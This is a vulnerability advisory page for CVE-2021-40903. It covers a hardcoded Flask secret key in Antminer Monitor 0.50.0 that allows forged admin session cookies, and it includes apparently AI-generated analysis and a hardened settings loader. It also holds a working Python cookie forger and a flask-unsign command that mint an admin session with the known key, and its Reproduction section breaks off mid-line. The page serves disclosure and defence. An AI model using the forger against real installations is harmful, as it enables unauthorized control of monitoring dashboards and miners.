CVE-2021-40903
Description
A vulnerability in Antminer Monitor 0.50.0 exists because of a backdoor or misconfiguration inside a settings file in the Flask server. The settings file has a predefined secret string, which should be randomly generated but is static.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Antminer Monitor 0.50.0 uses a hardcoded Flask secret key in settings.py, allowing an attacker to forge session cookies and bypass authentication.
Vulnerability
Antminer Monitor version 0.50.0 ships a hardcoded Flask secret key in its settings.py configuration file. Instead of a value generated randomly per installation, the developer left the static string 'super secret key' in the production build. Flask signs its client-side session cookie with this key (the cookie is signed, not encrypted), and the application's login state is read back from that session, so anyone who knows the key can mint a session the server accepts as genuine. The vulnerable code path is reachable by any user who can reach the web interface, with no special configuration required to trigger it. The affected version is 0.50.0 as described in the references [1] [3].
Exploitation
An attacker needs only network access to the Antminer Monitor web interface; no credentials are required. Using the Flask session tool flask-unsign, the attacker signs a session payload with the known secret key, producing a cookie in which `_user_id` is '1' (the admin account) and `_fresh` is True, the keys Flask-Login reads from the session to identify the logged-in user. Presenting this forged value in the `session` cookie makes the server treat the request as an authenticated admin session, bypassing the login page entirely. The steps are demonstrated in the exploit published on Exploit-DB and Packet Storm [1] [3].
Impact
Successful exploitation results in authentication bypass, granting the attacker full administrative privileges on the Antminer Monitor web interface. With admin access, the attacker can view and modify all monitored miners, including configuration data, hashrate, temperatures, and other sensitive system information. The impact is a complete compromise of confidentiality (information disclosure) and integrity (potential unauthorized configuration changes). The attacker gains the highest privilege level available in the application, effectively controlling the monitoring dashboard and the connected miner fleet.
Mitigation
As of the available references, no patched version has been released [1] [3]. The fix is to generate the Flask secret key randomly for each deployment and to keep it out of settings.py, for example by reading it from the environment or from a file outside the repository. Users are advised to set the SECRET_KEY variable themselves after installation to a long random value (at least 32 bytes from a CSPRNG) and restart the Flask server; changing the key invalidates every existing session, including any the attacker has already forged. DEBUG should be disabled in production at the same time. Until a vendor fix arrives, all installations running version 0.50.0 remain vulnerable. The CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Antminer Monitor / Antminer Monitor
- Range: =0.50.0
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The Flask secret key is hardcoded to a static value ('super secret key') in config/settings.py instead of being randomly generated per installation, allowing session cookie forgery."
Attack vector
An attacker can forge a valid Flask session cookie because the secret key is hardcoded to `'super secret key'` [ref_id=2]. Using the tool `flask-unsign`, the attacker signs a cookie containing `_user_id: '1'` and `_fresh: True`, which grants admin-level access to the web interface [ref_id=2]. The attacker only needs network access to the Antminer Monitor web server (commonly exposed on port 5000) and can then bypass the login page entirely. The same forged cookie works on every installation because the secret is identical across all deployments [ref_id=2].
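The forgery described above and in the Exploitation section, as an added example that is not code from Antminer Monitor or from flask-unsign. It re-implements with the standard library the cookie format Flask produces (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1 with the "hmac" key derivation), so it runs offline, and pairs the attacker's forging step with the server-side check that accepts it. The secret 'super secret key' and the keys `_user_id` / `_fresh` come from the advisory; the function names are this example's own, and Flask's tagged JSON for non-JSON types (tuples, bytes, datetimes) is not implemented.

```python
"""Forge and verify a Flask session cookie when SECRET_KEY is known.

Added example. Re-implements Flask's session cookie format with the standard
library: payload and timestamp are base64url, the signature is
HMAC-SHA1(HMAC-SHA1(secret, "cookie-session"), "<payload>.<timestamp>").
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"            # Flask's SecureCookieSessionInterface salt
KNOWN_SECRET = "super secret key"   # the static value in config/settings.py


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signature(secret_key: str, signed_value: str) -> str:
    # key_derivation="hmac": the signing key is HMAC-SHA1(secret, salt)
    key = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(key, signed_value.encode(), hashlib.sha1).digest())


def forge_session_cookie(secret_key: str, session: dict,
                         timestamp: Optional[int] = None) -> str:
    """Return "<payload>.<timestamp>.<sig>" in the form Flask issues."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:   # itsdangerous' compression rule
        body = "." + _b64e(compressed)       # leading "." marks a zlib payload
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = f"{body}.{ts_b64}"
    return f"{signed}.{_signature(secret_key, signed)}"


def verify_session_cookie(secret_key: str, cookie: str,
                          max_age: Optional[int] = None,
                          now: Optional[int] = None) -> Optional[dict]:
    """Server-side check: the session dict if signature and age hold, else None.

    The cookie is signed, not encrypted: anyone can read it, and anyone with
    the key can mint one. That is the whole vulnerability.
    """
    try:
        signed, sig = cookie.rsplit(".", 1)
        body, ts_b64 = signed.rsplit(".", 1)
    except ValueError:
        return None
    if not hmac.compare_digest(_signature(secret_key, signed), sig):
        return None
    issued = int.from_bytes(_b64d(ts_b64), "big")
    if max_age is not None:
        current = int(time.time()) if now is None else now
        if current - issued > max_age:
            return None
    if body.startswith("."):
        return json.loads(zlib.decompress(_b64d(body[1:])))
    return json.loads(_b64d(body))


if __name__ == "__main__":
    forged = forge_session_cookie(KNOWN_SECRET, {"_user_id": "1", "_fresh": True})
    print("Cookie: session=" + forged)
    # A server still using the shipped key accepts the forgery ...
    print(verify_session_cookie(KNOWN_SECRET, forged, max_age=31 * 86400))
    # ... one whose operator rotated SECRET_KEY rejects it.
    print(verify_session_cookie("rotated-" + "x" * 56, forged, max_age=31 * 86400))
```

The `max_age` check mirrors what Flask applies from PERMANENT_SESSION_LIFETIME when it opens a session; it does not help while the key is public, because the attacker simply forges a fresh cookie. The same forged value can be produced with the tool the text names, `flask-unsign --sign --cookie "{'_user_id': '1', '_fresh': True}" --secret 'super secret key'`, and rotating the key is what makes the verification fail.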
Affected code
The vulnerability is in the Flask configuration file `config/settings.py` (at commit `5c62e1064af30674bacb9e1917d5980efbde1fcd`). The file defines a static secret key `'super secret key'` instead of a randomly generated value [ref_id=2]. Additionally, `DEBUG = True` is set, enabling the Werkzeug debugger and its `/console` endpoint [ref_id=2]; on current Werkzeug releases that console is gated by a PIN printed to the server's stdout at startup, so it is a second exposure to remove rather than a direct remote shell.
What the fix does
No patch is provided in the bundle. The advisory [ref_id=2] identifies the root cause as a static secret key in `config/settings.py` that should have been randomly generated per installation. The remediation is to replace the hardcoded `'super secret key'` with a cryptographically random value generated at deployment time, and to set `DEBUG = False` in production to disable the `/console` endpoint. Without these changes, any attacker who knows the public secret can forge session cookies and gain admin access.
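The remediation described here and in the Mitigation section, as an added example that is not Antminer Monitor's `config/settings.py`. It shows the vulnerable settings beside a loader that fails closed: the key is read from a `SECRET_KEY` environment variable (name chosen for this example), the shipped default and short or low-entropy keys are rejected, and debug mode is allowed only when `APP_ENV=development` (this example's convention; `FLASK_DEBUG` is Flask's own variable). The values `'super secret key'` and `DEBUG = True` are the ones the advisory reports.

```python
"""Hardened Flask settings loader with a fail-closed startup check.

Added example. The environment variable names SECRET_KEY and APP_ENV are
this example's own conventions; FLASK_DEBUG is Flask's.
"""
import secrets
from typing import Dict, List, Optional

# What the vulnerable config/settings.py amounts to, per the advisory
# (constructed here as an environment mapping for the checker below).
VULNERABLE_SETTINGS_ENV = {"SECRET_KEY": "super secret key", "FLASK_DEBUG": "1"}

WEAK_DEFAULT = "super secret key"   # shipped value, publicly known
MIN_KEY_BYTES = 32                  # 256 bits; token_hex(32) gives 64 hex chars


def generate_secret_key() -> str:
    """Per-deployment random key. Run once and store it outside the repo."""
    return secrets.token_hex(MIN_KEY_BYTES)


def secret_key_problems(key: Optional[str]) -> List[str]:
    """Reasons a SECRET_KEY must not be used; an empty list means acceptable."""
    if not key:
        return ["SECRET_KEY is unset"]
    problems = []
    if key == WEAK_DEFAULT:
        problems.append("SECRET_KEY is the publicly known default 'super secret key'")
    if len(key.encode()) < MIN_KEY_BYTES:
        problems.append(f"SECRET_KEY shorter than {MIN_KEY_BYTES} bytes")
    if len(set(key)) < 8:   # crude entropy heuristic, catches "aaaa..." style keys
        problems.append("SECRET_KEY has too few distinct characters to be random")
    return problems


def settings_problems(env: Dict[str, str]) -> List[str]:
    """All reasons the server must refuse to start with this environment."""
    problems = secret_key_problems(env.get("SECRET_KEY"))
    debug = env.get("FLASK_DEBUG") == "1"
    if debug and env.get("APP_ENV") != "development":
        problems.append("DEBUG=True outside development exposes the Werkzeug debugger")
    return problems


def load_settings(env: Dict[str, str]) -> Dict[str, object]:
    """Flask config mapping; raises instead of starting with a weak setup."""
    problems = settings_problems(env)
    if problems:
        raise RuntimeError("refusing to start: " + "; ".join(problems))
    return {
        "SECRET_KEY": env["SECRET_KEY"],
        "DEBUG": env.get("FLASK_DEBUG") == "1",
        "SESSION_COOKIE_HTTPONLY": True,
        "SESSION_COOKIE_SAMESITE": "Lax",
    }


if __name__ == "__main__":
    print("vulnerable config:", settings_problems(VULNERABLE_SETTINGS_ENV))
    print("hardened config:", load_settings({"SECRET_KEY": generate_secret_key()}))
```

In a real deployment the returned mapping is passed to `app.config.update(...)`; the point of `settings_problems` is that the same code path that would have silently run with `'super secret key'` now refuses to serve requests at all.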
Preconditions
- network: The Antminer Monitor web interface must be network-accessible to the attacker (e.g., exposed on port 5000).
- auth: No authentication is required before exploitation; the attacker forges a session cookie directly.
Reproduction
1. Identify a target running Antminer Monitor 0.5.0 on `http://
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- packetstormsecurity.com/files/164048/Antminer-Monitor-0.5.0-Authentication-Bypass.html (x_refsource_MISC)
- www.exploit-db.com/exploits/50267 (x_refsource_MISC)
News mentions
No linked articles in our index yet.